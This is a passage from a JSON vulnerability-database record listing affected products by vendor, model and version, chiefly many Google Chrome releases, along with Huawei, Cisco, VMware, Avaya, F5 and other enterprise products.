"version": "5.0.376.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "22.0.1229.50" }, { "model": "im and presence service", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "vcloud networking and security", "scope": "eq", "trust": 0.3, "vendor": "vmware", "version": "5.5.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "27.0.1453.88" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1077.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.38" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.1.249.1025" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.921.3" }, { "model": "oceanstor uds v100r002c00lvdf0", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.17" }, { "model": "aura application server sip core", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "53002.1" }, { "model": "oceanstor s5600t v100r002c00", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "23.0.1271.10" }, { "model": "security virtual server protection for vmware", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.742.54" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.835.155" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.538.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.519.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1041.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.963.69" }, { "model": "high-density server dh321 v100r002c00", "scope": "eq", "trust": 0.3, "vendor": "huawei", "version": "v2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.912.40" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "15.0.874.14" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.45" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.561.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "28.0.1500.5" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1306.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1311.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.586.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.928.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "27.0.1453.93" }, { "model": "aura collaboration environment", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "3.0" }, { "model": "storeever esl g3 tape library", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.696.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "23.0.1271.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.517.5" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.766.0" }, { "model": "ip deskphone", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "96x16.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "30.0.1599.23" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "20.0.1132.28" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.28" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.472.34" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.43" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.740.0" }, { "model": "proactive network operations center", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.835.125" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.472.50" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.14" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.50" }, { "model": "gaia r75.20", "scope": null, "trust": 0.3, "vendor": "checkpoint", "version": null }, { "model": "vfabric application director", "scope": "eq", "trust": 0.3, "vendor": "vmware", "version": "5.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.603.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.597.45" }, { "model": "linux", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "7" }, { "model": "security access manager for web", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.0.4" }, { "model": "email and web security appliance", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "5.6" }, { "model": "espace ivs v100r001", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "22.0.1229.14" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.529.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "28.0.1500.95" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.597.66" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.830.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.597.31" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.912.75" }, { "model": "oceanstor s5500t v100r005c00", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.203" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.399.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.835.126" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.648.131" }, { "model": "advanced threat defense", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "3.2" }, { "model": "chrome beta", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.0.249.78" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.335.2" }, { "model": "oceanstor s2600t v100r002c01", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "35.0.1916.84" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "31.0.1650.46" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.925.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.64" }, { "model": "oceanstor n8300 v100r002c00", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.499.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "30.0.1599.7" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "15.0.864.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.963.44" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.13" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.76" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1312.18" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.40" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.39" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "20.0.1132.43" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1076.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.447.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.963.9" }, { "model": "traffix sdc", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "3.4.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "33.0.1750.117" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "27.0.1453.106" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.597.63" }, { "model": "big-ip wom", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.0" }, { "model": "aura application enablement services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1" }, { "model": "workcentre r14-10 spar", "scope": "ne", "trust": 0.3, "vendor": "xerox", "version": "7765061.090.224.30300" }, { "model": "it business management suite", "scope": "eq", "trust": 0.3, "vendor": "vmware", "version": "1.0" }, { "model": "oceanstor s5600t v100r003c00", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "t620 plus flexible quad core thin client", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "22.0.1229.8" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "21.0.1180.72" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.597.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.458.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.597.40" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.208" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1682.5" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.14" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.959.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.106" }, { "model": "oceanstor v100r001c01", "scope": "eq", "trust": 0.3, "vendor": "huawei", "version": "9000" }, { "model": "virtualization performance viewer", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "1.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "0.2.149.27" }, { "model": "enterprise linux workstation", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "7" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.624.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "33.0.1750.40" }, { "model": "linux amd64", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "10.04" }, { "model": "security access manager for mobile", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.835.156" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.612.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.26" }, { "model": "b189 ip conference phone", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "1.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.472.12" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.472.18" }, { "model": "propel", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "1.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.835.4" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1293.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.38" }, { "model": "oceanstor s5500 v100r001c01", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1668.4" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1654.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.58" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "27.0.1453.73" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.912.25" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.472.28" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.698.0" }, { "model": "secureplatform r75.46", "scope": "eq", "trust": 0.3, "vendor": "checkpoint", "version": "2.6" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.472.13" }, { "model": "ipso r71.10", "scope": "eq", "trust": 0.3, "vendor": "checkpoint", "version": "6.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1079.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.742.74" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.597.29" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.338" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "33.0.1750.71" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "22.0.1229.51" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.598.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "27.0.1453.89" }, { "model": "high-density server xh321 v100r002c00", "scope": "eq", "trust": 0.3, "vendor": "huawei", "version": "v2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.25" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1287.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.963.30" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.742.65" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.894.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.696.30" }, { "model": "aura system manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1.3" }, { "model": "data recovery", "scope": "eq", "trust": 0.3, "vendor": "vmware", "version": "2.0.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.835.87" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.1.249.1061" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.906.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.777.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "31.0.1650.58" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.954.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.408.6" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.737.0" }, { "model": "oceanstor s5800t v100r005c02", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1284.1" }, { "model": "ip deskphone", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "96x16.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.237" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.445.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.214" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.21" }, { "model": "storeonce backup", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "3.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.514.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.648.23" }, { "model": "prime collaboration assurance", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "27.0.1444.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1672.2" }, { "model": "operation agent virtual appliance", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "11.14" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "30.0.1599.53" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1025.41" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.0.275.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "37.0.2062.52" }, { "model": "aura system platform sp2", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "websphere process server hypervisor edition", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0" }, { "model": "web gateway", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "7.3.2.9." }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.517.27" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "31.0.1650.54" }, { "model": "oceanstor v100r001c02", "scope": "eq", "trust": 0.3, "vendor": "huawei", "version": "v1500" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.827.10" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.517.7" }, { "model": "ucs central", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.320" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "37.0.2062.124" }, { "model": "nsx for vsphere", "scope": "eq", "trust": 0.3, "vendor": "vmware", "version": "6.0.4" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.43" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.81" }, { "model": "vpn gateway", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "3090" }, { "model": "services vm", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "2.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.696.28" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.311" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.693.0" }, { "model": "oceanstor vtl6900 v100r005c00", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.597.36" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.736.0" }, { "model": "email gateway", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "7.0.4" }, { "model": "colorqube", "scope": "eq", "trust": 0.3, "vendor": "xerox", "version": "9303" }, { "model": "network security manager", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "6.1.1538" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1084.12" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.912.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1069.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1668.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1025.98" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1019.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.35" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.606.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.742.16" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.438.0" }, { "model": "encryption switch 2498-e32", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "33.0.1750.39" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.775.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.742.3" }, { "model": "oceanstor css v100r001c05", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "31.0.1650.62" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "30.0.1599.12" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "15.0.874.120" }, { "model": "horizon workspace", "scope": "eq", "trust": 0.3, "vendor": "vmware", "version": "1.5" }, { "model": "thinpro", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "4.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.517.11" }, { "model": "workcentre", "scope": "eq", "trust": 0.3, "vendor": "xerox", "version": "7235" }, { "model": "server automation", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "9.12" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "35.0.1916.43" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.209" }, { "model": "idp series", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.742.113" }, { "model": "phaser r14-12 spar", "scope": "ne", "trust": 0.3, "vendor": "xerox", "version": "7800081.150.104.35600" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.77" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "34.0.1847.60" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "31.0.1650.22" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1299.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.226" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "15.0.869.0" }, { "model": "dc v100r002", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "33.0.1750.64" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "21.0.1180.56" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.738.0" }, { "model": "big-ip analytics", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.1.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "33.0.1750.7" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.597.102" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.231" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "21.0.1180.39" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.32" }, { "model": "arx", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "6.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1025.36" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19" }, { "model": "edge digital media player", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "3000" }, { "model": "gaia r70", "scope": null, "trust": 0.3, "vendor": "checkpoint", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "29.0.1547.2" }, { "model": "secureplatform r71.20", "scope": "eq", "trust": 0.3, "vendor": "checkpoint", "version": "2.6" }, { "model": "oceanstor s5800t v100r001c00", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.912.29" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.696.18" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "34.0.1847.116" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.696.54" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.963.13" }, { "model": "secureplatform ngx r65", "scope": null, "trust": 0.3, "vendor": "checkpoint", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1700.98" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.835.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.578.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.418.9" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "33.0.1750.79" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "15.0.874.121" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.648.54" }, { "model": "big-ip gtm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.6" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "31.0.1650.63" }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.29" }, { "model": "smart zero core", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "4.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "30.0.1599.18" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.958.0" }, { "model": "agile controller v100r001c00spc205", "scope": "ne", "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.380.0" }, { "model": "cloud single sign on", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "4.0.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "34.0.1847.25" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "15.0.874.17" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.28" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.809.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "15.0.874.2" }, { "model": "show and share", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "5(2)" }, { "model": "mds", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.742.105" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "31.0.1650.50" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1681.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "15" }, { "model": "arx", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "6.3" }, { "model": "gaia embedded r75.10", "scope": null, "trust": 0.3, "vendor": "checkpoint", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.76" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "37.0.2062.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.361.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1036.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.1.249.1018" }, { "model": "flex system manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.3.1" }, { "model": "hyperdp oceanstor n8500 v200r001c91", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.701.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "28.0.1500.54" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", 